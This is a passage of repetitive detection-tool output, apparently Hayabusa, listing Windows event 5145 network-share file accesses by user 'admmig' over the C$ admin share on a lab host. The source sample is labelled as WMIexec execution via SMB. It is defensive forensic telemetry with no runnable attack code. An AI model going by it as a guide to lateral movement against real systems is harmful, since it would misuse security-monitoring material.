Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# | IP Addr: 10.23.23.9 | LID: 